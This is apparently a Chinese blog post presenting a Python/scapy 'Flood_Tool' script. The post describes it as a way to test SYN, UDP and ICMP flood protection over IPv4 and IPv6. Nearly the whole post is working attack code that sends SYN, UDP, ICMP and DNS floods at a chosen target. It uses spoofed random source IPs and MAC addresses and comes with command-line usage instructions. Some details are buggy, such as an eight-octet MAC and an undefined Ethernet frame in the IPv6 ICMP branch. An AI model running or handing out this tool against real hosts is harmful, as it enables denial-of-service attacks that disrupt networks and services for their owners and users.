1. 程式人生 > >SYN、UDP、ICMP測試指令碼,支援ipv4和ipv6

SYN、UDP、ICMP測試指令碼,支援ipv4和ipv6

該指令碼用於測試SYN防護,UDP防護,ICMP防護。已知軟體支援ipv6的有hyenae。
環境:python+scapy庫
使用pip install scapy安裝scapy庫後使用。
執行方式cmd執行Python Flood_Tool.py 型別 源ip 目的ip 目的mac 傳輸資料 傳送次數
不要直接在idle中開啟執行。

#!/usr/bin/python
# -*- utf-8 -*-
import os
import sys
import random
from scapy.all import *
from multiprocessing import Pool
import time
from string import ascii_lowercase as lc


def randomIP6():
    charNum = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']
    ip6 = ':'.join(map(str, (
        charNum[random.randint(0, 15)] + charNum[random.randint(0, 15)] + charNum[random.randint(0, 15)] + charNum[
            random.randint(0, 15)] for _ in range(8))))
    return ip6

def randomMac():
    charNum = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']
    mac = ':'.join(map(str, (charNum[random.randint(0, 15)] + charNum[random.randint(0, 15)] for _ in range(8))))
    return mac


def randomIP():
    ip = ".".join(map(str, (random.randint(0, 255) for _ in range(4))))
    return ip


def randInt():
    x = random.randint(1000, 9000)
    return x


def randDomain():
    domain = 'www.' + ''.join(random.choice(lc) for _ in range(5)) + '.com'
    return domain
    
def SYN_Flood(dstIP, dstPort, dstMac, counter, srcIP, data):
    data = '' if data == 'none' else data
    dstMac = 'ff:ff:ff:ff:ff:ff:ff:ff' if dstMac == 'none' else dstMac
    total = 0

    print("Packets are sending ...")
    for _ in range(0, counter):
        s_port = randInt()
        s_eq = randInt()
        w_indow = randInt()

        if ':' in dstIP:
            IP_Packet = IPv6()
            IP_Packet.src = randomIP6() if srcIP == 'random' else srcIP
        else:
            IP_Packet = IP()
            IP_Packet.src = randomIP() if srcIP == 'random' else srcIP
        IP_Packet.dst = dstIP

        TCP_Packet = TCP()
        TCP_Packet.sport = s_port
        TCP_Packet.dport = dstPort
        TCP_Packet.flags = "S"
        TCP_Packet.seq = s_eq
        TCP_Packet.window = w_indow

        ETH_Packet = Ether(src=randomMac(), dst=dstMac) if srcIP == 'random' else Ether(dst=dstMac)
        sendp(ETH_Packet / IP_Packet / TCP_Packet / data, verbose=0)
        total += 1

    sys.stdout.write("\nTotal packets sent: %i\n" % total)

def UDP_Flood(dstIP, dstPort, dstMac, counter, srcIP, data):
    data = '' if data == 'none' else data
    dstMac = 'ff:ff:ff:ff:ff:ff:ff:ff' if dstMac == 'none' else dstMac
    total = 0

    print("Packets are sending ...")
    for _ in range(0, counter):
        s_port = randInt()

        if ':' in dstIP:
            IP_Packet = IPv6()
            IP_Packet.src = randomIP6() if srcIP == 'random' else srcIP
        else:
            IP_Packet = IP()
            IP_Packet.src = randomIP() if srcIP == 'random' else srcIP
        IP_Packet.dst = dstIP

        UDP_Packet = UDP()
        UDP_Packet.sport = s_port
        UDP_Packet.dport = dstPort

        ETH_Packet = Ether(src=randomMac(), dst=dstMac) if srcIP == 'random' else Ether(dst=dstMac)
        sendp(ETH_Packet / IP_Packet / UDP_Packet / data, verbose=0)
        total += 1
    sys.stdout.write("\nTotal packets sent: %i\n" % total)

def ICMP_Flood(dstIP, _, dstMac, counter, srcIP, data):
    data = '' if data == 'none' else data
    dstMac = 'ff:ff:ff:ff:ff:ff:ff:ff' if dstMac == 'none' else dstMac
    total = 0
    print("Packets are sending ...")
    for _ in range(0, counter):

        if ':' in dstIP:
            IP_Packet = IPv6()
            IP_Packet.src = randomIP6() if srcIP == 'random' else srcIP
        else:
            IP_Packet = IP()
            IP_Packet.src = randomIP() if srcIP == 'random' else srcIP
        IP_Packet.dst = dstIP

        if ':' in srcIP:
            ICMP_Packet = ICMPv6EchoRequest()
        else:
            ICMP_Packet = ICMP(type=8)
            ETH_Packet = Ether(src=randomMac(), dst=dstMac) if srcIP == 'random' else Ether(dst=dstMac)
        sendp(ETH_Packet / IP_Packet / ICMP_Packet / data, verbose=0)
        total += 1
    sys.stdout.write("\nTotal packets sent: %i\n" % total)

def DNS_Flood(dstIP, dstPort, dstMac, counter, srcIP, _):
    dstMac = 'ff:ff:ff:ff:ff:ff:ff:ff' if dstMac == 'none' else dstMac
    total = 0
    print("Packets are sending ...")
    for _ in range(0, counter):
        s_port = randInt()

        if ':' in dstIP:
            IP_Packet = IPv6()
            IP_Packet.src = randomIP6() if srcIP == 'random' else srcIP
        else:
            IP_Packet = IP()
            IP_Packet.src = randomIP() if srcIP == 'random' else srcIP
        IP_Packet.dst = dstIP

        UDP_Packet = UDP()
        UDP_Packet.sport = s_port
        UDP_Packet.dport = dstPort
        DNS_Packet = DNS(rd=1, qd=DNSQR(qname=randDomain()))

        ETH_Packet = Ether(src=randomMac(), dst=dstMac) if srcIP == 'random' else Ether(dst=dstMac)
        sendp(ETH_Packet / IP_Packet / UDP_Packet / DNS_Packet, verbose=0)
        total += 1

    sys.stdout.write("\nTotal packets sent: %i\n" % total)

def help():
    print("#############################")
    print("#         Usage             #")
    print("#############################\n")
    print(
        "python Flood_Tool.py flood_type srcIP(random for random ip) dstIP dstPort dstMac(none for Broadcast) data("
        "none for empty) packets")
    print("flood_type : SYN UDP ICMP DNS")
    exit(0)


def info():
    os.system("cls")

    # 引數個數不對
    if len(sys.argv) <= 7:
        help()

    print("#############################")
    print("#   Welcome to Flood Tool   #")
    print("#############################")

    return sys.argv[1:]


def main():
    # 多程序
    worker_count = 1
    p = Pool(worker_count)
    flood_type, srcIP, dstIP, dstPort, dstMac, data, packets = info()
    if flood_type == 'SYN':
        for i in range(worker_count):
            p.apply_async(SYN_Flood, args=(dstIP, int(dstPort), dstMac, int(packets), srcIP, data))
    elif flood_type == 'UDP':
        for i in range(worker_count):
            p.apply_async(UDP_Flood, args=(dstIP, int(dstPort), dstMac, int(packets), srcIP, data))
    elif flood_type == 'ICMP':
        for i in range(worker_count):
            p.apply_async(ICMP_Flood, args=(dstIP, int(dstPort), dstMac, int(packets), srcIP, data))
    elif flood_type == 'DNS':
        for i in range(worker_count):
            p.apply_async(DNS_Flood, args=(dstIP, int(dstPort), dstMac, int(packets), srcIP, data))

    else:
        help()
    p.close()
    p.join()


if __name__ == '__main__':
    main()